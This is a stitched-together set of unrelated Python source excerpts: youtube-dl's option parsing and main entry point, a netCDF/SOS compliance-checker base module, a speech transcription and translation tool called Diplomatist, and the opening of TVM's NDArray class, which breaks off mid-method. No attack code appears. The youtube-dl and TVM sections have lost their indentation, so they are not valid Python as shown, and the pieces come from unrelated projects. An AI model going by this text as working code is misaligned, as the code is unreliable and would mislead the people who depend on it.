if h.find(':', 1) < 0:
parser.error('wrong header formatting, it should be key:value, not "%s"' % h)
key, value = h.split(':', 2)
if opts.verbose:
write_string('[debug] Adding header from command line option %s:%s\n' % (key, value))
std_headers[key] = value
# Dump user agent
if opts.dump_user_agent:
compat_print(std_headers['User-Agent'])
sys.exit(0)
# Batch file verification
batch_urls = []
if opts.batchfile is not None:
try:
if opts.batchfile == '-':
batchfd = sys.stdin
else:
batchfd = io.open(opts.batchfile, 'r', encoding='utf-8', errors='ignore')
batch_urls = read_batch_urls(batchfd)
if opts.verbose:
write_string('[debug] Batch file urls: ' + repr(batch_urls) + '\n')
except IOError:
sys.exit('ERROR: batch file could not be read')
all_urls = batch_urls + args
all_urls = [url.strip() for url in all_urls]
_enc = preferredencoding()
all_urls = [url.decode(_enc, 'ignore') if isinstance(url, bytes) else url for url in all_urls]
if opts.list_extractors:
for ie in list_extractors(opts.age_limit):
compat_print(ie.IE_NAME + (' (CURRENTLY BROKEN)' if not ie._WORKING else ''))
matchedUrls = [url for url in all_urls if ie.suitable(url)]
for mu in matchedUrls:
compat_print(' ' + mu)
sys.exit(0)
if opts.list_extractor_descriptions:
for ie in list_extractors(opts.age_limit):
if not ie._WORKING:
continue
desc = getattr(ie, 'IE_DESC', ie.IE_NAME)
if desc is False:
continue
if hasattr(ie, 'SEARCH_KEY'):
_SEARCHES = ('cute kittens', 'slithering pythons', 'falling cat', 'angry poodle', 'purple fish', 'running tortoise', 'sleeping bunny', 'burping cow')
_COUNTS = ('', '5', '10', 'all')
desc += ' (Example: "%s%s:%s" )' % (ie.SEARCH_KEY, random.choice(_COUNTS), random.choice(_SEARCHES))
compat_print(desc)
sys.exit(0)
# Conflicting, missing and erroneous options
if opts.usenetrc and (opts.username is not None or opts.password is not None):
parser.error('using .netrc conflicts with giving username/password')
if opts.password is not None and opts.username is None:
parser.error('account username missing\n')
if opts.outtmpl is not None and (opts.usetitle or opts.autonumber or opts.useid):
parser.error('using output template conflicts with using title, video ID or auto number')
if opts.usetitle and opts.useid:
parser.error('using title conflicts with using video ID')
if opts.username is not None and opts.password is None:
opts.password = compat_getpass('Type account password and press [Return]: ')
if opts.ratelimit is not None:
numeric_limit = FileDownloader.parse_bytes(opts.ratelimit)
if numeric_limit is None:
parser.error('invalid rate limit specified')
opts.ratelimit = numeric_limit
if opts.min_filesize is not None:
numeric_limit = FileDownloader.parse_bytes(opts.min_filesize)
if numeric_limit is None:
parser.error('invalid min_filesize specified')
opts.min_filesize = numeric_limit
if opts.max_filesize is not None:
numeric_limit = FileDownloader.parse_bytes(opts.max_filesize)
if numeric_limit is None:
parser.error('invalid max_filesize specified')
opts.max_filesize = numeric_limit
if opts.retries is not None:
if opts.retries in ('inf', 'infinite'):
opts_retries = float('inf')
else:
try:
opts_retries = int(opts.retries)
except (TypeError, ValueError):
parser.error('invalid retry count specified')
if opts.buffersize is not None:
numeric_buffersize = FileDownloader.parse_bytes(opts.buffersize)
if numeric_buffersize is None:
parser.error('invalid buffer size specified')
opts.buffersize = numeric_buffersize
if opts.playliststart <= 0:
raise ValueError('Playlist start must be positive')
if opts.playlistend not in (-1, None) and opts.playlistend < opts.playliststart:
raise ValueError('Playlist end must be greater than playlist start')
if opts.extractaudio:
if opts.audioformat not in ['best', 'aac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
parser.error('invalid audio format specified')
if opts.audioquality:
opts.audioquality = opts.audioquality.strip('k').strip('K')
if not opts.audioquality.isdigit():
parser.error('invalid audio quality specified')
if opts.recodevideo is not None:
if opts.recodevideo not in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
parser.error('invalid video recode format specified')
if opts.convertsubtitles is not None:
if opts.convertsubtitles not in ['srt', 'vtt', 'ass']:
parser.error('invalid subtitle format specified')
if opts.date is not None:
date = DateRange.day(opts.date)
else:
date = DateRange(opts.dateafter, opts.datebefore)
# Do not download videos when there are audio-only formats
if opts.extractaudio and not opts.keepvideo and opts.format is None:
opts.format = 'bestaudio/best'
# --all-sub automatically sets --write-sub if --write-auto-sub is not given
# this was the old behaviour if only --all-sub was given.
if opts.allsubtitles and not opts.writeautomaticsub:
opts.writesubtitles = True
outtmpl = ((opts.outtmpl is not None and opts.outtmpl) or
(opts.format == '-1' and opts.usetitle and '%(title)s-%(id)s-%(format)s.%(ext)s') or
(opts.format == '-1' and '%(id)s-%(format)s.%(ext)s') or
(opts.usetitle and opts.autonumber and '%(autonumber)s-%(title)s-%(id)s.%(ext)s') or
(opts.usetitle and '%(title)s-%(id)s.%(ext)s') or
(opts.useid and '%(id)s.%(ext)s') or
(opts.autonumber and '%(autonumber)s-%(id)s.%(ext)s') or
DEFAULT_OUTTMPL)
if not os.path.splitext(outtmpl)[1] and opts.extractaudio:
parser.error('Cannot download a video and extract audio into the same'
' file! Use "{0}.%(ext)s" instead of "{0}" as the output'
' template'.format(outtmpl))
any_getting = opts.geturl or opts.gettitle or opts.getid or opts.getthumbnail or opts.getdescription or opts.getfilename or opts.getformat or opts.getduration or opts.dumpjson or opts.dump_single_json
any_printing = opts.print_json
download_archive_fn = compat_expanduser(opts.download_archive) if opts.download_archive is not None else opts.download_archive
# PostProcessors
postprocessors = []
# Add the metadata pp first, the other pps will copy it
if opts.metafromtitle:
postprocessors.append({
'key': 'MetadataFromTitle',
'titleformat': opts.metafromtitle
})
if opts.addmetadata:
postprocessors.append({'key': 'FFmpegMetadata'})
if opts.extractaudio:
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': opts.audioformat,
'preferredquality': opts.audioquality,
'nopostoverwrites': opts.nopostoverwrites,
})
if opts.recodevideo:
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': opts.recodevideo,
})
if opts.convertsubtitles:
postprocessors.append({
'key': 'FFmpegSubtitlesConvertor',
'format': opts.convertsubtitles,
})
if opts.embedsubtitles:
postprocessors.append({
'key': 'FFmpegEmbedSubtitle',
})
if opts.xattrs:
postprocessors.append({'key': 'XAttrMetadata'})
if opts.embedthumbnail:
already_have_thumbnail = opts.writethumbnail or opts.write_all_thumbnails
postprocessors.append({
'key': 'EmbedThumbnail',
'already_have_thumbnail': already_have_thumbnail
})
if not already_have_thumbnail:
opts.writethumbnail = True
# Please keep ExecAfterDownload towards the bottom as it allows the user to modify the final file in any way.
# So if the user is able to remove the file before your postprocessor runs it might cause a few problems.
if opts.exec_cmd:
postprocessors.append({
'key': 'ExecAfterDownload',
'exec_cmd': opts.exec_cmd,
})
if opts.xattr_set_filesize:
try:
import xattr
xattr # Confuse flake8
except ImportError:
parser.error('setting filesize xattr requested but python-xattr is not available')
external_downloader_args = None
if opts.external_downloader_args:
external_downloader_args = compat_shlex_split(opts.external_downloader_args)
postprocessor_args = None
if opts.postprocessor_args:
postprocessor_args = compat_shlex_split(opts.postprocessor_args)
match_filter = (
None if opts.match_filter is None
else match_filter_func(opts.match_filter))
ydl_opts = {
'usenetrc': opts.usenetrc,
'username': opts.username,
'password': opts.password,
'twofactor': opts.twofactor,
'videopassword': opts.videopassword,
'quiet': (opts.quiet or any_getting or any_printing),
'no_warnings': opts.no_warnings,
'forceurl': opts.geturl,
'forcetitle': opts.gettitle,
'forceid': opts.getid,
'forcethumbnail': opts.getthumbnail,
'forcedescription': opts.getdescription,
'forceduration': opts.getduration,
'forcefilename': opts.getfilename,
'forceformat': opts.getformat,
'forcejson': opts.dumpjson or opts.print_json,
'dump_single_json': opts.dump_single_json,
'simulate': opts.simulate or any_getting,
'skip_download': opts.skip_download,
'format': opts.format,
'listformats': opts.listformats,
'outtmpl': outtmpl,
'autonumber_size': opts.autonumber_size,
'restrictfilenames': opts.restrictfilenames,
'ignoreerrors': opts.ignoreerrors,
'force_generic_extractor': opts.force_generic_extractor,
'ratelimit': opts.ratelimit,
'nooverwrites': opts.nooverwrites,
'retries': opts_retries,
'buffersize': opts.buffersize,
'noresizebuffer': opts.noresizebuffer,
'continuedl': opts.continue_dl,
'noprogress': opts.noprogress,
'progress_with_newline': opts.progress_with_newline,
'playliststart': opts.playliststart,
'playlistend': opts.playlistend,
'playlistreverse': opts.playlist_reverse,
'noplaylist': opts.noplaylist,
'logtostderr': opts.outtmpl == '-',
'consoletitle': opts.consoletitle,
'nopart': opts.nopart,
'updatetime': opts.updatetime,
'writedescription': opts.writedescription,
'writeannotations': opts.writeannotations,
'writeinfojson': opts.writeinfojson,
'writethumbnail': opts.writethumbnail,
'write_all_thumbnails': opts.write_all_thumbnails,
'writesubtitles': opts.writesubtitles,
'writeautomaticsub': opts.writeautomaticsub,
'allsubtitles': opts.allsubtitles,
'listsubtitles': opts.listsubtitles,
'subtitlesformat': opts.subtitlesformat,
'subtitleslangs': opts.subtitleslangs,
'matchtitle': decodeOption(opts.matchtitle),
'rejecttitle': decodeOption(opts.rejecttitle),
'max_downloads': opts.max_downloads,
'prefer_free_formats': opts.prefer_free_formats,
'verbose': opts.verbose,
'dump_intermediate_pages': opts.dump_intermediate_pages,
'write_pages': opts.write_pages,
'test': opts.test,
'keepvideo': opts.keepvideo,
'min_filesize': opts.min_filesize,
'max_filesize': opts.max_filesize,
'min_views': opts.min_views,
'max_views': opts.max_views,
'daterange': date,
'cachedir': opts.cachedir,
'youtube_print_sig_code': opts.youtube_print_sig_code,
'age_limit': opts.age_limit,
'download_archive': download_archive_fn,
'cookiefile': opts.cookiefile,
'nocheckcertificate': opts.no_check_certificate,
'prefer_insecure': opts.prefer_insecure,
'proxy': opts.proxy,
'socket_timeout': opts.socket_timeout,
'bidi_workaround': opts.bidi_workaround,
'debug_printtraffic': opts.debug_printtraffic,
'prefer_ffmpeg': opts.prefer_ffmpeg,
'include_ads': opts.include_ads,
'default_search': opts.default_search,
'youtube_include_dash_manifest': opts.youtube_include_dash_manifest,
'encoding': opts.encoding,
'extract_flat': opts.extract_flat,
'merge_output_format': opts.merge_output_format,
'postprocessors': postprocessors,
'fixup': opts.fixup,
'source_address': opts.source_address,
'call_home': opts.call_home,
'sleep_interval': opts.sleep_interval,
'external_downloader': opts.external_downloader,
'list_thumbnails': opts.list_thumbnails,
'playlist_items': opts.playlist_items,
'xattr_set_filesize': opts.xattr_set_filesize,
'match_filter': match_filter,
'no_color': opts.no_color,
'ffmpeg_location': opts.ffmpeg_location,
'hls_prefer_native': opts.hls_prefer_native,
'external_downloader_args': external_downloader_args,
'postprocessor_args': postprocessor_args,
'cn_verification_proxy': opts.cn_verification_proxy,
}
with YoutubeDL(ydl_opts) as ydl:
# Update version
if opts.update_self:
update_self(ydl.to_screen, opts.verbose)
# Remove cache dir
if opts.rm_cachedir:
ydl.cache.remove()
# Maybe do nothing
if (len(all_urls) < 1) and (opts.load_info_filename is None):
if opts.update_self or opts.rm_cachedir:
sys.exit()
ydl.warn_if_short_id(sys.argv[1:] if argv is None else argv)
parser.error(
'You must provide at least one URL.\n'
'Type youtube-dl --help to see a list of all options.')
try:
if opts.load_info_filename is not None:
retcode = ydl.download_with_info_file(opts.load_info_filename)
else:
retcode = ydl.download(all_urls)
except MaxDownloadsReached:
ydl.to_screen('--max-download limit reached, aborting.')
retcode = 101
sys.exit(retcode)
def main(argv=None):
    """Command-line entry point: run _real_main and map known failures to exit codes.

    argv : optional list of command-line arguments; None means sys.argv
           (resolution happens inside _real_main).
    """
    try:
        _real_main(argv)
    except DownloadError:
        # Details were already printed by the downloader; just signal failure.
        sys.exit(1)
    except SameFileError:
        sys.exit('ERROR: fixed output name but more than one file to download')
    except KeyboardInterrupt:
        sys.exit('\nERROR: Interrupted by user')
__all__ = ['main', 'YoutubeDL', 'gen_extractors', 'list_extractors']
| |
#!/usr/bin/env python
"""
Compliance Checker
"""
from functools import wraps
import collections
import pprint
from wicken.netcdf_dogma import NetCDFDogma
from wicken.xml_dogma import MultipleXmlDogma
from wicken.exceptions import DogmaGetterSetterException
from netCDF4 import Dataset
from owslib.swe.observation.sos100 import SensorObservationService_1_0_0
from owslib.swe.sensor.sml import SensorML
from owslib.namespaces import Namespaces
from petulantbear.netcdf_etree import namespaces as pb_namespaces
def get_namespaces():
    """Build the XML namespace map used by the SOS/SensorML dogma objects.

    Returns the owslib namespaces for ogc/sml/gml/sos/swe/xlink, with the
    "ows" prefix pinned to the OWS 1.1.0 namespace.
    """
    resolver = Namespaces()
    mapping = resolver.get_namespaces(["ogc", "sml", "gml", "sos", "swe", "xlink"])
    mapping["ows"] = resolver.get_namespace("ows110")
    return mapping
class DSPair(object):
    """
    Pairs a dataset/SOS instance with its Dogma wrapper.

    One DSPair is handed to every check method.
    """
    dataset = None
    dogma = None

    def __init__(self, ds, dogma):
        self.dogma = dogma
        self.dataset = ds
class BaseCheck(object):
    """Abstract base for all checkers: priority levels plus the Checker API."""

    # Check priority levels, highest first.
    HIGH = 3
    MEDIUM = 2
    LOW = 1

    # Dataset types this checker can handle; subclasses override.
    supported_ds = []

    @classmethod
    def beliefs(cls):
        """Return the belief map for this checker; subclasses must override."""
        raise NotImplementedError("Define this in your derived Checker class")

    def setup(self, ds):
        """
        Common setup hook for a Checker.

        Run automatically when executing a CheckSuite; the default is a no-op.
        """
        pass

    def load_datapair(self, ds):
        """
        Return a DSPair with *ds* on one side and the proper Dogma object on the other.

        Subclasses must override.
        """
        raise NotImplementedError("Define this in your derived checker class")
class BaseNCCheck(object):
    """
    Base class for check suites that operate on netCDF Datasets.
    """
    supported_ds = [Dataset]

    def load_datapair(self, ds):
        """Wrap *ds* in a NetCDFDogma and return the DSPair."""
        # Accept both "nc" and "ncml" prefixes by aliasing "nc" to the
        # existing ncml namespace.
        ns = pb_namespaces.copy()
        ns['nc'] = ns['ncml']
        dogma = NetCDFDogma('ds', self.beliefs(), ds, namespaces=ns)
        return DSPair(ds, dogma)
class BaseSOSGCCheck(object):
    """
    Base class for check suites driven by a SOS GetCapabilities response.
    """
    supported_ds = [SensorObservationService_1_0_0]

    def load_datapair(self, ds):
        """Wrap the service's capabilities document in a MultipleXmlDogma."""
        dogma = MultipleXmlDogma('sos-gc', self.beliefs(), ds._capabilities, namespaces=get_namespaces())
        return DSPair(ds, dogma)
class BaseSOSDSCheck(object):
    """
    Base class for check suites driven by a SOS DescribeSensor (SensorML) response.
    """
    supported_ds = [SensorML]

    def load_datapair(self, ds):
        """Wrap the SensorML document root in a MultipleXmlDogma."""
        dogma = MultipleXmlDogma('sos-ds', self.beliefs(), ds._root, namespaces=get_namespaces())
        return DSPair(ds, dogma)
class Result(object):
    """
    Outcome of a single check method.

    value may be True/False, a (passed, total) tuple, or None for a skip.
    Also carries the check's weight, granular messages, child results, and
    the checker instance / check method that produced it.
    """

    def __init__(self, weight=BaseCheck.MEDIUM, value=None, name=None, msgs=None, children=None, checker=None, check_method=None):
        self.weight = weight
        self.value = value
        self.name = name
        self.msgs = msgs if msgs else []
        self.children = children if children else []
        self.checker = checker
        self.check_method = check_method

    def __repr__(self):
        text = "%s (*%s): %s" % (self.name, self.weight, self.value)
        if len(self.msgs):
            # One message is shown inline; several are summarized by count.
            if len(self.msgs) == 1:
                text += " (%s)" % self.msgs[0]
            else:
                text += " (%d msgs)" % len(self.msgs)
        if len(self.children):
            text += " (%d children)" % len(self.children)
            text += "\n" + pprint.pformat(self.children)
        if self.checker is not None:
            text += " Checker: " + str(self.checker)
        if self.check_method is not None:
            text += " Call: " + str(self.check_method)
        return text
def std_check_in(dataset_dogma, name, allowed_vals):
    """
    Score an attribute against a list of allowed values.

    Returns 0 if the attribute is absent, 1 if present but not an allowed
    value (or unreadable), and 2 if present with an allowed value.
    """
    if not hasattr(dataset_dogma, name):
        return 0
    score = 1
    try:
        if getattr(dataset_dogma, name) in allowed_vals:
            score += 1
    except DogmaGetterSetterException:
        # Present but not retrievable: leave the score at 1.
        pass
    return score
def std_check(dataset_dogma, name):
    """Return True when *name* is present on the dogma object, else False."""
    if hasattr(dataset_dogma, name):
        # Touch the attribute so any dogma-side retrieval actually runs.
        getattr(dataset_dogma, name)
        return True
    return False
def check_has(priority=BaseCheck.HIGH):
    """
    Decorator factory: turn a method returning attribute names into a check.

    The wrapped method must return a list whose items are either plain
    attribute names or (name, allowed_values) tuples; each item is scored
    via std_check/std_check_in and wrapped in a Result of *priority*.
    """
    def _inner(func):
        def _dec(s, ds):
            results = []
            for item in func(s, ds):
                msgs = []
                if isinstance(item, tuple):
                    # Value-constrained attribute: score 0/1/2 out of 2.
                    name, allowed = item
                    score = std_check_in(ds.dogma, name, allowed)
                    if score == 0:
                        msgs.append("Attr %s not present" % name)
                    elif score == 1:
                        msgs.append("Attr %s present but not in expected value list (%s)" % (name, allowed))
                    results.append(Result(priority, (score, 2), name, msgs))
                else:
                    # Presence-only attribute: boolean result.
                    present = std_check(ds.dogma, item)
                    if not present:
                        msgs = ["Attr %s not present" % item]
                    results.append(Result(priority, present, item, msgs))
            return results
        return wraps(func)(_dec)
    return _inner
def fix_return_value(v, method_name, method=None, checker=None):
    """
    Normalize a check method's return value into a Result.

    Scalars and None are wrapped in a Result named after the check method
    (with the common "check_" prefix stripped); the checker instance and
    the method that produced the value are recorded on the Result.
    """
    if not method_name:
        # Bound methods expose the underlying function via __func__; plain
        # functions are used directly.  This works on Python 2 and 3 alike,
        # unlike the old Python-2-only method.im_func.func_name chain, which
        # also crashed when *method* was a plain function.
        method_name = getattr(method, "__func__", method).__name__
    method_name = method_name.replace("check_", "")  # strip common prefix
    if v is None or not isinstance(v, Result):
        v = Result(value=v, name=method_name)
    v.name = v.name or method_name
    v.checker = checker
    v.check_method = method
    return v
def score_group(group_name=None):
    """
    Decorator factory: prefix every Result name with *group_name*.

    The wrapped check may return a single Result or a list of Results;
    each result's name is rebuilt as a tuple rooted at group_name so
    reporting can group related checks together.
    """
    def _inner(func):
        def _dec(s, ds):
            ret_val = func(s, ds)
            if not isinstance(ret_val, list):
                ret_val = [ret_val]

            def dogroup(r):
                cur_grouping = r.name
                if isinstance(cur_grouping, tuple):
                    cur_grouping = list(cur_grouping)
                elif not isinstance(cur_grouping, list):
                    cur_grouping = [cur_grouping]
                cur_grouping.insert(0, group_name)
                return Result(r.weight, r.value, tuple(cur_grouping), r.msgs)

            # func.__name__ (not the Python-2-only func_name) and explicit list
            # comprehensions keep this correct on Python 3, where map() would
            # return a lazy iterator instead of the list callers expect.
            ret_val = [fix_return_value(x, func.__name__, func, s) for x in ret_val]
            return [dogroup(r) for r in ret_val]
        return wraps(func)(_dec)
    return _inner
| |
import os
import sys
import time
import subprocess
import optparse
import threading
import platform
import pydub
import json
import speech_recognition
if platform.system() == "Darwin":
from LoopbackCapture.mac.LoopbackCapture import record_sounds
elif platform.system() == "Linux":
from LoopbackCapture.linux.LoopbackCapture import record_sounds
elif platform.system() == "Windows":
from LoopbackCapture.win32.LoopbackCapture import record_sounds
from mic import record_mic
class Diplomatist():
    """Real-time transcription (and optional translation) pipeline.

    Records audio from the system loopback device or the microphone, feeds
    it to one of several speech-recognition back ends, optionally translates
    the transcript, and can append results to an .srt subtitle file.
    All configuration is read from config.json.
    """

    def __init__(self, transcribe_api=0, translate_api=1):
        """Load config.json and select the transcription/translation back ends."""
        self.load_config()
        self.set_transcribe_api(transcribe_api)
        self.set_translate_api(translate_api)
        os.environ["LOOPBACK_CAPTURE"] = self.config["LOOPBACK_CAPTURE"]
        if platform.system() == "Windows":
            # On Windows the loopback capture helper is an external binary;
            # fail fast when it is missing.
            if not os.path.isfile(os.environ["LOOPBACK_CAPTURE"]):
                print("LOOPBACK_CAPTURE error: File Not Found")
                sys.exit(-1)
        if self.config["SRT"] != "":
            # Append subtitles to the configured .srt file for the whole run.
            self.srt_out = open(self.config["SRT"], "a")
        for proxy in self.config["PROXY"]:
            os.environ[proxy] = self.config["PROXY"][proxy]

    def _failed_if_null(self, input, warning=False):
        """internal function, check if input is null

        args:
            input (item): value to validate
            warning (bool): print a warning instead of raising
        return:
            input, unchanged
        raises:
            Exception: when input is None or "" and warning is False
        """
        if input is None or input == "":
            if warning:
                print("[WARNING]: {} is null.".format(input))
            else:
                raise Exception("[ERROR]: {} is null.".format(input))
        return input

    def load_config(self):
        """load config from config.json"""
        with open("config.json") as in_file:
            self.config = json.load(in_file)

    def save_config(self):
        """save config to config.json"""
        with open("config.json", "w") as out_file:
            json.dump(self.config, out_file, sort_keys=True, indent=4)

    def set_transcribe_api(self, api=0):
        """set transcribe api

        args:
            api (int): 0 Sphinx, 1 Google Cloud, 2 Bing, 3 Houndify,
                       4 DeepSpeech, 5 Azure Speech
        """
        self.transcribe_api = api
        self.cred = None
        if "cred" in self.config["API"][str(api)] and self.config["API"][str(api)]["cred"] != "":
            cred_config = self.config["API"][str(api)]["cred"]
            if os.path.isfile(cred_config):
                # BUG FIX: read the credential *file's contents*; the old code
                # called .read() on the file name string, which always raised.
                with open(cred_config) as in_file:
                    self.cred = in_file.read()
            else:
                # Not a file path: treat the config value as the credential itself.
                self.cred = cred_config
        if self.transcribe_api == 4:
            if platform.system() == "Windows":
                print("DeepSpeech not support Windows for now, please use other APIs.")
                sys.exit(-1)
            from deepspeech import DeepSpeechRecognizer
            self.deepspeech_recognizer = DeepSpeechRecognizer(self._failed_if_null(self.config["API"]["4"]["model"]), self._failed_if_null(self.config["API"]["4"]["alphabet"]), self._failed_if_null(self.config["API"]["4"]["lm"]), self._failed_if_null(self.config["API"]["4"]["trie"]))
        if self.transcribe_api == 5:
            from azurespeech import AzureSpeechRecognizer
            self.azurespeech_recognizer = AzureSpeechRecognizer(self._failed_if_null(self.config["API"]["5"]["key"]), self._failed_if_null(self.config["API"]["5"]["region"]))

    def set_translate_api(self, api=1):
        """set translate api

        args:
            api (int): 1 selects Google Cloud Translate
        """
        self.translate_api = api
        if self.translate_api == 1:
            import google.cloud.translate
            self.translate_client = google.cloud.translate.Client()

    def transcribe(self, language="en-US", audio_file=None):
        """transcribe audio to text

        args:
            language (str)
            audio_file (str)
        return:
            result (str/False): transcript, or False on recognition failure
        """
        audio_file_ext = audio_file.split(".")[-1]
        # BUG FIX: the old code compared strings with `is not`, which tests
        # object identity, so even genuine wav/aif files were re-converted.
        if audio_file_ext != "wav" and audio_file_ext != "aif":
            ori_audio_file = pydub.AudioSegment.from_file(
                audio_file, audio_file_ext)
            # BUG FIX: replace only the trailing extension; str.replace()
            # rewrote the first occurrence anywhere in the path
            # (e.g. "mp3song.mp3" -> "wavsong.mp3").
            audio_file = audio_file[:-len(audio_file_ext)] + "wav"
            ori_audio_file.export(audio_file, format="wav")
        recognizer = speech_recognition.Recognizer()
        with speech_recognition.AudioFile(audio_file) as source:
            audio = recognizer.record(source)
        try:
            if self.transcribe_api == 0:
                return recognizer.recognize_sphinx(audio, language)
            elif self.transcribe_api == 1:
                return recognizer.recognize_google_cloud(audio, self.cred, language)
            elif self.transcribe_api == 2:
                return recognizer.recognize_bing(audio, self.cred, language)
            elif self.transcribe_api == 3:
                # Houndify credential is stored as "client_id,client_key".
                return recognizer.recognize_houndify(audio, self.cred.split(",")[0], self.cred.split(",")[1])
            elif self.transcribe_api == 4:
                return self.deepspeech_recognizer.recognize(audio_file)
            elif self.transcribe_api == 5:
                return self.azurespeech_recognizer.recognize(audio_file)
        except speech_recognition.UnknownValueError:
            print("Could Not Understand")
            return False
        except speech_recognition.RequestError as e:
            print("Request Error: {0}".format(e))
            return False

    def translate(self, text, language):
        """translate text to another language

        args:
            text (str)
            language (str)
        return:
            translated_text (str)
        """
        if hasattr(self, "translate_client"):
            return self.translate_client.translate(text, target_language=language)['translatedText']

    def async_transcribe(self, language="en-US", audio_file=None):
        """transcribe function for async running

        args:
            language (str)
            audio_file (str)
        """
        transc = self.transcribe(language, audio_file)
        if transc == False:
            transc = "Could Not Be Transcribed!"
        if hasattr(self, "srt_out"):
            self.srt_out.write(transc + "\n")
        print(transc)

    def async_transcribe_translate(self, transc_lan="en-US", audio_file=None, transl_lan="zh"):
        """transcribe with translate function for async running

        args:
            transc_lan (str)
            audio_file (str)
            transl_lan (str)
        """
        transc = self.transcribe(transc_lan, audio_file)
        if transc == False:
            transc = "Could Not Be Transcribed!"
        if hasattr(self, "srt_out"):
            self.srt_out.write(transc + "\n")
        print(transc)
        transl = self.translate(transc, transl_lan)
        if hasattr(self, "srt_out"):
            self.srt_out.write(transl + "\n")
        print(transl)

    def keep_running(self, language="en-US", time_slice=10000, use_mic=False, translate=None):
        """keep the process running until abort it

        args:
            language (str)
            time_slice (int): length of each recording chunk, ms
            use_mic (bool): record from microphone instead of loopback
            translate (str): target language, or None to skip translation
        """
        init_time = 0
        record_file = "record.wav"
        records_folder = self.config["RECORD"]
        if not os.path.isdir(records_folder):
            os.mkdir(records_folder)
        try:
            while True:
                start_time = time.time()
                if use_mic:
                    record_mic(record_file, time_slice)
                else:
                    record_sounds(record_file, time_slice)
                end_time = time.time()
                # SRT-style time range for this chunk, relative to the run start.
                time_str = "{} --> {}".format(time.strftime("%H:%M:%S", time.gmtime(
                    init_time)), time.strftime("%H:%M:%S", time.gmtime(end_time - start_time + init_time)))
                if hasattr(self, "srt_out"):
                    self.srt_out.write(time_str + "\n")
                print(time_str)
                init_time = end_time - start_time + init_time
                # Move the chunk to a unique file so the next recording
                # can start while this one is transcribed in the background.
                saved_audio_file = os.path.join(
                    records_folder, str(time.time()) + ".wav")
                os.rename(record_file, saved_audio_file)
                if translate:
                    thr = threading.Thread(target=self.async_transcribe_translate, args=(
                        language, saved_audio_file, translate), kwargs={})
                else:
                    thr = threading.Thread(target=self.async_transcribe, args=(
                        language, saved_audio_file), kwargs={})
                thr.start()
        except KeyboardInterrupt:
            print("Process was exited.")

    def run_one_time(self, language="en-US", audio_file=None, translate=None):
        """run the process one time

        args:
            language (str)
            audio_file (str)
            translate (str): target language, or None to skip translation
        """
        if translate:
            self.async_transcribe_translate(
                language, audio_file, translate)
        else:
            self.async_transcribe(
                language, audio_file)
def get_options():
    """Parse command-line options for the CLI entry point.

    Returns the optparse options object; positional args are ignored.
    """
    parser = optparse.OptionParser()
    parser.add_option("-m", "--mic", dest="use_mic", action="store_true", default=False,
                      help="record sounds from microphone")
    parser.add_option("-f", "--file", dest="audio_file", default=None,
                      help="audio file which to be transcribed and translated")
    parser.add_option("-s", "--slice", dest="time_slice", default=10000, type="int",
                      help="time slice of each wave file")
    # FIX: help text previously omitted API 5, which set_transcribe_api supports.
    parser.add_option("-a", "--api", dest="api", default=0, type="int",
                      help="0 - CMU Sphinx, 1 - Google Cloud, 2 - Bing API, 3 - Houndify API, 4 - Baidu DeepSpeech, 5 - Azure Speech")
    parser.add_option("-l", "--lan", dest="language", default="en-US",
                      help="language which to be transcribed")
    parser.add_option("-t", "--tran", dest="translate", default=None,
                      help="translate to another language")
    parser.add_option("--qt", dest="ui_qt", action="store_true", default=False,
                      help="runs UI with QT")
    parser.add_option("--tk", dest="ui_tk", action="store_true", default=False,
                      help="runs UI with Tk")
    (options, args) = parser.parse_args()
    return options
# Script entry point: parse CLI options, then either transcribe one file or
# keep capturing audio in time slices until interrupted.
if __name__ == "__main__":
    options = get_options()
    diplomatist = Diplomatist(options.api)
    if options.audio_file:
        # One-shot mode: transcribe (and optionally translate) the given file.
        diplomatist.run_one_time(options.language, options.audio_file, options.translate)
        sys.exit(0)
    # Continuous mode: record from loopback/microphone in time_slice chunks.
    diplomatist.keep_running(options.language, options.time_slice, options.use_mic, options.translate)
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-import, redefined-outer-name
"""Runtime NDArray API"""
import ctypes
import warnings
import numpy as np
import tvm._ffi
from tvm._ffi.base import _LIB, check_call, c_array, string_types, _FFI_MODE
from tvm._ffi.runtime_ctypes import DataType, Device, TVMArray, TVMArrayHandle
from tvm._ffi.runtime_ctypes import DataTypeCode, tvm_shape_index_t
from . import _ffi_api
try:
# pylint: disable=wrong-import-position
if _FFI_MODE == "ctypes":
raise ImportError()
from tvm._ffi._cy3.core import _set_class_ndarray, _make_array, _from_dlpack
from tvm._ffi._cy3.core import NDArrayBase
except (RuntimeError, ImportError) as error:
# pylint: disable=wrong-import-position
if _FFI_MODE == "cython":
raise error
from tvm._ffi._ctypes.ndarray import _set_class_ndarray, _make_array, _from_dlpack
from tvm._ffi._ctypes.ndarray import NDArrayBase
@tvm._ffi.register_object("runtime.NDArray")
class NDArray(NDArrayBase):
    """Lightweight NDArray class of TVM runtime.

    Strictly this is only an Array Container (a buffer object).
    No arithmetic operations are defined.
    All operations are performed by TVM functions.

    The goal is not to re-build yet another array library.
    Instead, this is a minimal data structure to demonstrate
    how can we use TVM in existing project which might have their own array containers.
    """

    @property
    def dtype(self):
        """Type of this array"""
        return str(self.handle.contents.dtype)

    @property
    def device(self):
        """Device of this array"""
        return self.handle.contents.device

    def __dlpack__(self, stream=None):  # pylint: disable=unused-argument
        """Export the array for consumption by from_dlpack() as a DLPack capsule.

        Parameters
        ----------
        stream : int, optional
            A Python integer representing a pointer to a stream.
            Stream is provided by the consumer to the producer to instruct the producer
            to ensure that operations can safely be performed on the array.

        Returns
        -------
        capsule : PyCapsule
            A DLPack capsule for the array, containing a DLPackManagedTensor.
        """
        return self.to_dlpack()

    def __dlpack_device__(self):
        """Return a tuple of device_type, device_id in DLPack convention"""
        return (self.handle.contents.device.device_type, self.handle.contents.device.device_id)

    def __hash__(self):
